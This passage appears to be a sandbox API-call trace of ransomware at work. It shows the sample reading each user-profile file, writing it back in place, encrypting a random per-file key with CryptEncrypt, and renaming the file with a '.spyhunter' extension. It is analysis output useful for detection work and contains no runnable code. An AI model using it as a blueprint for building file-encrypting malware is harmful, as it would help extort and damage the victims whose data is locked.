lpOverlapped=0x0) returned 1 [0141.492] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffffb01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.492] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4ff, lpNumberOfBytesWritten=0x248f394, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f394*=0x4ff, lpOverlapped=0x0) returned 1 [0141.493] GetProcessHeap () returned 0x2c0000 [0141.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.493] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.493] WriteFile (in: hFile=0xf0, lpBuffer=0x248f3d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f394, lpOverlapped=0x0 | out: lpBuffer=0x248f3d4*, lpNumberOfBytesWritten=0x248f394*=0x4, lpOverlapped=0x0) returned 1 [0141.493] WriteFile (in: hFile=0xf0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f394, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f394*=0x30, lpOverlapped=0x0) returned 1 [0141.493] CloseHandle (hObject=0xf0) returned 1 [0141.493] GetProcessHeap () returned 0x2c0000 [0141.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0141.493] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.spyhunter") returned 134 [0141.493] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl.spyhunter")) returned 1 [0141.494] GetProcessHeap () returned 0x2c0000 [0141.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0141.494] GetProcessHeap () returned 0x2c0000 [0141.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.494] GetProcessHeap () returned 0x2c0000 [0141.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x2c0000) returned 1 [0141.494] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f3d8 | out: pbBuffer=0x248f3d8) returned 1 [0141.494] GetProcessHeap () returned 0x2c0000 [0141.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.494] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f3d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f3d0*=0x30) returned 1 [0141.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0141.494] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl") returned 122 [0141.495] StrStrW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".txt") returned 0x0 [0141.495] GetProcessHeap () returned 0x2c0000 [0141.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.495] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f394, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f394*=0x414, lpOverlapped=0x0) returned 1 [0141.496] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffffbec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.496] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x414, lpNumberOfBytesWritten=0x248f394, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f394*=0x414, lpOverlapped=0x0) returned 1 [0141.496] GetProcessHeap () returned 0x2c0000 [0141.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.496] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.496] WriteFile (in: hFile=0xf0, lpBuffer=0x248f3d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f394, lpOverlapped=0x0 | out: lpBuffer=0x248f3d4*, lpNumberOfBytesWritten=0x248f394*=0x4, lpOverlapped=0x0) returned 1 [0141.496] WriteFile (in: hFile=0xf0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f394, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f394*=0x30, lpOverlapped=0x0) returned 1 [0141.496] CloseHandle (hObject=0xf0) returned 1 [0141.496] GetProcessHeap () returned 0x2c0000 [0141.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0141.497] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.spyhunter") returned 132 [0141.497] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl.spyhunter")) returned 1 [0141.497] GetProcessHeap () returned 0x2c0000 [0141.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0141.497] GetProcessHeap () returned 0x2c0000 [0141.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.497] GetProcessHeap () returned 0x2c0000 [0141.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f04158 | out: hHeap=0x2c0000) returned 1 [0141.497] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f3d0 | out: pbBuffer=0x248f3d0) returned 1 [0141.497] GetProcessHeap () returned 0x2c0000 [0141.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.497] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f3c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f3c8*=0x30) returned 1 [0141.498] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0141.498] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned 74 [0141.498] StrStrW (lpFirst="brndlog.bak", lpSrch=".txt") returned 0x0 [0141.498] GetProcessHeap () returned 0x2c0000 [0141.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.498] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f38c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f38c*=0x2800, lpOverlapped=0x0) returned 1 [0141.499] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.499] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f38c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f38c*=0x2800, lpOverlapped=0x0) returned 1 [0141.499] GetProcessHeap () returned 0x2c0000 [0141.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.499] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.500] WriteFile (in: hFile=0xf0, lpBuffer=0x248f3cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f38c, lpOverlapped=0x0 | out: lpBuffer=0x248f3cc*, lpNumberOfBytesWritten=0x248f38c*=0x4, lpOverlapped=0x0) returned 1 [0141.500] WriteFile (in: hFile=0xf0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f38c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f38c*=0x30, lpOverlapped=0x0) returned 1 [0141.500] CloseHandle (hObject=0xf0) returned 1 [0141.500] GetProcessHeap () returned 0x2c0000 [0141.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0141.500] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak.spyhunter") returned 84 [0141.500] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak.spyhunter")) returned 1 [0141.501] GetProcessHeap () returned 0x2c0000 [0141.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0141.501] GetProcessHeap () returned 0x2c0000 [0141.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.501] GetProcessHeap () returned 0x2c0000 [0141.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff7ac8 | out: hHeap=0x2c0000) returned 1 [0141.503] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f3c8 | out: pbBuffer=0x248f3c8) returned 1 [0141.503] GetProcessHeap () returned 0x2c0000 [0141.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.503] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f3c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f3c0*=0x30) returned 1 [0141.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0141.503] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]") returned 75 [0141.503] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0141.504] GetProcessHeap () returned 0x2c0000 [0141.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.504] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f384, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f384*=0x0, lpOverlapped=0x0) returned 1 [0141.504] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.504] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x248f384, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f384*=0x0, lpOverlapped=0x0) returned 1 [0141.504] GetProcessHeap () returned 0x2c0000 [0141.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.504] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.504] WriteFile (in: hFile=0xf0, lpBuffer=0x248f3c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f384, lpOverlapped=0x0 | out: lpBuffer=0x248f3c4*, lpNumberOfBytesWritten=0x248f384*=0x4, lpOverlapped=0x0) returned 1 [0141.505] WriteFile (in: hFile=0xf0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f384, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f384*=0x30, lpOverlapped=0x0) returned 1 [0141.505] CloseHandle (hObject=0xf0) returned 1 [0141.505] GetProcessHeap () returned 0x2c0000 [0141.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0141.505] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1].spyhunter") returned 85 [0141.505] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1].spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1].spyhunter")) returned 1 [0141.506] GetProcessHeap () returned 0x2c0000 [0141.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0141.506] GetProcessHeap () returned 0x2c0000 [0141.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.506] GetProcessHeap () returned 0x2c0000 [0141.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff7908 | out: hHeap=0x2c0000) returned 1 [0141.506] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f3c0 | out: pbBuffer=0x248f3c0) returned 1 [0141.506] GetProcessHeap () returned 0x2c0000 [0141.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.506] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f3b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f3b8*=0x30) returned 1 [0141.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0141.506] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini") returned 77 [0141.506] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0141.506] GetProcessHeap () returned 0x2c0000 [0141.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.506] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f37c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f37c*=0x43, lpOverlapped=0x0) returned 1 [0141.507] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.507] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x248f37c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f37c*=0x43, lpOverlapped=0x0) returned 1 [0141.507] GetProcessHeap () returned 0x2c0000 [0141.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.507] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.507] WriteFile (in: hFile=0xf0, lpBuffer=0x248f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f37c, lpOverlapped=0x0 | out: lpBuffer=0x248f3bc*, lpNumberOfBytesWritten=0x248f37c*=0x4, lpOverlapped=0x0) returned 1 [0141.508] WriteFile (in: hFile=0xf0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f37c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f37c*=0x30, lpOverlapped=0x0) returned 1 [0141.508] CloseHandle (hObject=0xf0) returned 1 [0141.508] GetProcessHeap () returned 0x2c0000 [0141.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0141.508] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.spyhunter") returned 87 [0141.508] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini.spyhunter")) returned 1 [0141.540] GetProcessHeap () returned 0x2c0000 [0141.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0141.540] GetProcessHeap () returned 0x2c0000 [0141.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.540] GetProcessHeap () returned 0x2c0000 [0141.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f31f68 | out: hHeap=0x2c0000) returned 1 [0141.540] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f3c0 | out: pbBuffer=0x248f3c0) returned 1 [0141.540] GetProcessHeap () returned 0x2c0000 [0141.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.541] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f3b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f3b8*=0x30) returned 1 [0141.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0141.564] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 113 [0141.564] StrStrW (lpFirst="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpSrch=".txt") returned 0x0 [0141.564] GetProcessHeap () returned 0x2c0000 [0141.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0141.564] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f37c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f37c*=0x5e4, lpOverlapped=0x0) returned 1 [0141.580] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa1c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.580] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x248f37c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f37c*=0x5e4, lpOverlapped=0x0) returned 1 [0141.580] GetProcessHeap () returned 0x2c0000 [0141.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0141.580] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.580] WriteFile (in: hFile=0x158, lpBuffer=0x248f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f37c, lpOverlapped=0x0 | out: lpBuffer=0x248f3bc*, lpNumberOfBytesWritten=0x248f37c*=0x4, lpOverlapped=0x0) returned 1 [0141.580] WriteFile (in: hFile=0x158, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f37c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f37c*=0x30, lpOverlapped=0x0) returned 1 [0141.580] CloseHandle (hObject=0x158) returned 1 [0141.580] GetProcessHeap () returned 0x2c0000 [0141.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0141.581] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.spyhunter") returned 123 [0141.581] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount.spyhunter")) returned 1 [0141.581] GetProcessHeap () returned 0x2c0000 [0141.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0141.581] GetProcessHeap () returned 0x2c0000 [0141.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.581] GetProcessHeap () returned 0x2c0000 [0141.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe9d60 | out: hHeap=0x2c0000) returned 1 [0141.582] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f3b8 | out: pbBuffer=0x248f3b8) returned 1 [0141.582] GetProcessHeap () returned 0x2c0000 [0141.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.582] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f3b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f3b0*=0x30) returned 1 [0141.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\oeold.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0141.582] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 67 [0141.582] StrStrW (lpFirst="oeold.xml", lpSrch=".txt") returned 0x0 [0141.582] GetProcessHeap () returned 0x2c0000 [0141.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0141.582] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f374, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f374*=0x104, lpOverlapped=0x0) returned 1 [0141.583] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.583] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x104, 